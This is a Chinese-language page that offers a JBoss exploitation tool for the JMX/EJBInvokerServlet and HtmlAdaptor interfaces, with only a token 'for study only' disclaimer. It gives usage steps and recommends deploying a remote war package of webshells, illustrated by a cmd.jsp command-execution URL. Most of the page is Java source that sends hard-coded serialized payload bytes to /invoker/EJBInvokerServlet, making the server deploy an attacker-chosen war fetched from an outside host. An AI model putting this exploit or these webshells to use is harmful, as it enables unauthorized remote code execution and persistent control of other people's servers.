Jboss JMX/EJBInvokerServlet、HtmlAdaptor漏洞利用工具
免责声明:本站提供的所有工具及代码仅供交流学习,不得用于商业或黑客行为。下载地址:Jboss漏洞利用工具.jar 链接: 密码: ucdl 功能说明:
安装jdk并配置好环境变量,然后填好参数先点获取即可,成功后会返回"请求成功."。 1、JMX/EJBInvokerServlet: host写IP或域名:127.0.0.1/p2j.cn port必填,如:8080 2、HtmlAdaptor: host写URL地址:http://localhost:8080 port不需填写 3、war包推荐使用:http://javaweb.org/is.war,is.war里面带有几个版本的一句话和一个cmd.jsp (如:http://xxx.com/is/?cmd.jsp?pwd=023&cmd=ls)如果使用自己的war包, cmd功能需要默认配置(/is/cmd.jsp)war包只自带了mysql数据库所需要的jar, 连接oracle等其他数据库需要自己添加jar包
截图-JMX/EJBInvokerServlet:
截图-HtmlAdaptor:
核心源码:
package org.javaweb.jboss; import java.io.BufferedReader; import java.io.ByteArrayOutputStream; import java.io.IOException; import java.io.InputStreamReader; import java.net.InetSocketAddress; import java.net.URL; import java.nio.ByteBuffer; import java.nio.channels.SocketChannel; import java.util.ArrayList; import java.util.List; public class Test { byte[] a1 = new byte[]{ (byte) 0xac,(byte) 0xed,0x00,0x05,0x73,0x72,0x00,0x29,0x6f,0x72,0x67,0x2e,0x6a,0x62,0x6f,0x73, // ....sr.) org.jbos 0x73,0x2e,0x69,0x6e,0x76,0x6f,0x63,0x61,0x74,0x69,0x6f,0x6e,0x2e,0x4d,0x61,0x72, // s.invoca tion.Mar 0x73,0x68,0x61,0x6c,0x6c,0x65,0x64,0x49,0x6e,0x76,0x6f,0x63,0x61,0x74,0x69,0x6f, // shalledI nvocatio 0x6e,(byte) 0xf6,0x06,(byte) 0x95,0x27,0x41,0x3e,(byte) 0xa4,(byte) 0xbe,0x0c,0x00,0x00,0x78,0x70,0x70,0x77, // n...'A>. ....xppw 0x08,0x78,(byte) 0x94,(byte) 0x98,0x47,(byte) 0xc1,(byte) 0xd0,0x53,(byte) 0x87,0x73,0x72,0x00,0x11,0x6a,0x61,0x76, // .x..G..S .sr..jav 0x61,0x2e,0x6c,0x61,0x6e,0x67,0x2e,0x49,0x6e,0x74,0x65,0x67,0x65,0x72,0x12,(byte) 0xe2, // a.lang.I nteger.. (byte) 0xa0,(byte) 0xa4,(byte) 0xf7,(byte) 0x81,(byte) 0x87,0x38,0x02,0x00,0x01,0x49,0x00,0x05,0x76,0x61,0x6c,0x75, // .....8.. .I..valu 0x65,0x78,0x72,0x00,0x10,0x6a,0x61,0x76,0x61,0x2e,0x6c,0x61,0x6e,0x67,0x2e,0x4e, // exr..jav a.lang.N 0x75,0x6d,0x62,0x65,0x72,(byte) 0x86,(byte) 0xac,(byte) 0x95,0x1d,0x0b,(byte) 0x94,(byte) 0xe0,(byte) 0x8b,0x02,0x00,0x00, // umber... ........ 0x78,0x70,0x26,(byte) 0x95,(byte) 0xbe,0x0a,0x73,0x72,0x00,0x24,0x6f,0x72,0x67,0x2e,0x6a,0x62, // xp&...sr .$org.jb 0x6f,0x73,0x73,0x2e,0x69,0x6e,0x76,0x6f,0x63,0x61,0x74,0x69,0x6f,0x6e,0x2e,0x4d, // oss.invo cation.M 0x61,0x72,0x73,0x68,0x61,0x6c,0x6c,0x65,0x64,0x56,0x61,0x6c,0x75,0x65,(byte) 0xea,(byte) 0xcc, // arshalle dValue.. (byte) 0xe0,(byte) 0xd1,(byte) 0xf4,0x4a,(byte) 0xd0,(byte) 0x99,0x0c,0x00,0x00,0x78,0x70,0x77 }; byte[] aa = new byte[]{(byte) 0xeb,0x0,0x0,0x0,(byte) 0xe3}; byte[] ab = new byte[]{0x0,0x15}; byte[] a2 = new byte[]{ (byte) 0xac,(byte) 0xed,0x00,0x05,0x75,0x72,0x00,0x13,0x5b,0x4c,0x6a,0x61,0x76,0x61,0x2e, // .....ur. .[Ljava. 0x6c,0x61,0x6e,0x67,0x2e,0x4f,0x62,0x6a,0x65,0x63,0x74,0x3b,(byte) 0x90,(byte) 0xce,0x58,(byte) 0x9f, // lang.Obj ect;..X. 0x10,0x73,0x29,0x6c,0x02,0x00,0x00,0x78,0x70,0x00,0x00,0x00,0x04,0x73,0x72,0x00, // .s)l...x p....sr. 0x1b,0x6a,0x61,0x76,0x61,0x78,0x2e,0x6d,0x61,0x6e,0x61,0x67,0x65,0x6d,0x65,0x6e, // .javax.m anagemen 0x74,0x2e,0x4f,0x62,0x6a,0x65,0x63,0x74,0x4e,0x61,0x6d,0x65,0x0f,0x03,(byte) 0xa7,0x1b, // t.Object Name.... (byte) 0xeb,0x6d,0x15,(byte) 0xcf,0x03,0x00,0x00,0x78,0x70,0x74,0x00,0x21,0x6a,0x62,0x6f,0x73, // .m.....x pt.!jbos 0x73,0x2e,0x73,0x79,0x73,0x74,0x65,0x6d,0x3a,0x73,0x65,0x72,0x76,0x69,0x63,0x65, // s.system :service 0x3d,0x4d,0x61,0x69,0x6e,0x44,0x65,0x70,0x6c,0x6f,0x79,0x65,0x72,0x78,0x74,0x00, // =MainDep loyerxt. 0x06,0x64,0x65,0x70,0x6c,0x6f,0x79,0x75,0x71,0x00,0x7e,0x00,0x00,0x00,0x00,0x00, // .deployu q.~..... 0x01,0x74 }; byte[] a3 = new byte[]{ 0x75,0x72,0x00, 0x13,0x5b,0x4c,0x6a,0x61,0x76,0x61,0x2e,0x6c,0x61, // ur..[ Ljava.la 0x6e,0x67,0x2e,0x53,0x74,0x72,0x69,0x6e,0x67,0x3b,(byte) 0xad,(byte) 0xd2,0x56,(byte) 0xe7,(byte) 0xe9,0x1d, // ng.Strin g;..V... 0x7b,0x47,0x02,0x00,0x00,0x78,0x70,0x00,0x00,0x00,0x01,0x74,0x00,0x10,0x6a,0x61, // {G...xp. ...t..ja 0x76,0x61,0x2e,0x6c,0x61,0x6e,0x67,0x2e,0x53,0x74,0x72,0x69,0x6e,0x67 }; byte[] a4 = new byte[]{ 0x0d,(byte) 0xd3, (byte) 0xbe,(byte) 0xc9,0x78,0x77,0x04,0x00,0x00,0x00,0x01,0x73,0x72,0x00,0x22,0x6f,0x72,0x67, // ..xw.... .sr."org 0x2e,0x6a,0x62,0x6f,0x73,0x73,0x2e,0x69,0x6e,0x76,0x6f,0x63,0x61,0x74,0x69,0x6f, // .jboss.i nvocatio 0x6e,0x2e,0x49,0x6e,0x76,0x6f,0x63,0x61,0x74,0x69,0x6f,0x6e,0x4b,0x65,0x79,(byte) 0xb8, // n.Invoca tionKey. (byte) 0xfb,0x72,(byte) 0x84,(byte) 0xd7,(byte) 0x93,(byte) 0x85,(byte) 0xf9,0x02,0x00,0x01,0x49,0x00,0x07,0x6f,0x72,0x64, // .r...... ..I..ord 0x69,0x6e,0x61,0x6c,0x78,0x70,0x00,0x00,0x00,0x05,0x73,0x71,0x00,0x7e,0x00,0x05, // inalxp.. ..sq.~.. 0x77,0x0d,0x00,0x00,0x00,0x05,(byte) 0xac,(byte) 0xed,0x00,0x05,0x70,(byte) 0xfb,0x57,(byte) 0xa7,(byte) 0xaa,0x78, // w....... ..p.W..x 0x77,0x04,0x00,0x00,0x00,0x03,0x73,0x71,0x00,0x7e,0x00,0x07,0x00,0x00,0x00,0x04, // w.....sq .~...... 0x73,0x72,0x00,0x23,0x6f,0x72,0x67,0x2e,0x6a,0x62,0x6f,0x73,0x73,0x2e,0x69,0x6e, // sr.#org. jboss.in 0x76,0x6f,0x63,0x61,0x74,0x69,0x6f,0x6e,0x2e,0x49,0x6e,0x76,0x6f,0x63,0x61,0x74, // vocation .Invocat 0x69,0x6f,0x6e,0x54,0x79,0x70,0x65,0x59,(byte) 0xa7,0x3a,0x1c,(byte) 0xa5,0x2b,0x7c,(byte) 0xbf,0x02, // ionTypeY .:..+|.. 0x00,0x01,0x49,0x00,0x07,0x6f,0x72,0x64,0x69,0x6e,0x61,0x6c,0x78,0x70,0x00,0x00, // ..I..ord inalxp.. 0x00,0x01,0x73,0x71,0x00,0x7e,0x00,0x07,0x00,0x00,0x00,0x0a,0x70,0x74,0x00,0x0f, // ..sq.~.. ....pt.. 0x4a,0x4d,0x58,0x5f,0x4f,0x42,0x4a,0x45,0x43,0x54,0x5f,0x4e,0x41,0x4d,0x45,0x73, // JMX_OBJE CT_NAMEs 0x72,0x00,0x1b,0x6a,0x61,0x76,0x61,0x78,0x2e,0x6d,0x61,0x6e,0x61,0x67,0x65,0x6d, // r..javax .managem 0x65,0x6e,0x74,0x2e,0x4f,0x62,0x6a,0x65,0x63,0x74,0x4e,0x61,0x6d,0x65,0x0f,0x03, // ent.Obje ctName.. (byte) 0xa7,0x1b,(byte) 0xeb,0x6d,0x15,(byte) 0xcf,0x03,0x00,0x00,0x78,0x70,0x74,0x00,0x21,0x6a,0x62, // ...m.... .xpt.!jb 0x6f,0x73,0x73,0x2e,0x73,0x79,0x73,0x74,0x65,0x6d,0x3a,0x73,0x65,0x72,0x76,0x69, // oss.syst em:servi 0x63,0x65,0x3d,0x4d,0x61,0x69,0x6e,0x44,0x65,0x70,0x6c,0x6f,0x79,0x65,0x72,0x78, // ce=MainD eployerx 0x78 }; public void send(String host,int port,byte[] requestData) throws Exception { try { SocketChannel socketChannel = SocketChannel.open(); socketChannel.socket().connect(new InetSocketAddress(host,port),5000); socketChannel.configureBlocking(false); ByteBuffer byteBuffer = ByteBuffer.allocate(512); socketChannel.write(ByteBuffer.wrap(requestData)); while (true) { byteBuffer.clear(); int readBytes = socketChannel.read(byteBuffer); if (readBytes > 0) { byteBuffer.flip(); socketChannel.close(); break; } } } catch (IOException e) { throw e; } } protected void addByte(List<Byte> ls,byte[] b){ for(byte bb:b){ ls.add(bb); } } protected byte[] toByteArray(Byte[] b){ ByteArrayOutputStream bos = new ByteArrayOutputStream(); for(byte bs:b){ bos.write(bs); } return bos.toByteArray(); } public String request(String url) throws Exception{ String str = "",tmp; BufferedReader br = new BufferedReader(new InputStreamReader(new URL(url).openStream())); while((tmp=br.readLine())!=null){ str+=tmp+"\r\n"; } return str; } public void testEJBInvokerServlet(String host,int port,String war) throws Exception{ List<Byte> ls = new ArrayList<Byte>(); addByte(ls, a1); addByte(ls,aa); addByte(ls, a2); addByte(ls, ab); addByte(ls, war.getBytes()); addByte(ls, a3); addByte(ls, a4); byte[] b = toByteArray(ls.toArray(new Byte[ls.size()])); String req = "POST /invoker/EJBInvokerServlet/ HTTP/1.1\r\n"+ "ContentType: application/x-java-serialized-object; class=org.jboss.invocation.MarshalledInvocation\r\n"+ "Accept-Encoding: x-gzip,x-deflate,gzip,deflate\r\n"+ "User-Agent: Java/1.6.0_21\r\n"+ "Host: "+host+":"+port+"\r\n"+ "Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2\r\n"+ "Connection: keep-alive\r\n"+ "Content-type: application/x-www-form-urlencoded\r\n"+ "Content-Length: "+b.length+"\r\n\r\n"; ls.clear(); addByte(ls, req.getBytes()); addByte(ls, b); send(host,port,toByteArray(ls.toArray(new Byte[ls.size()]))); } }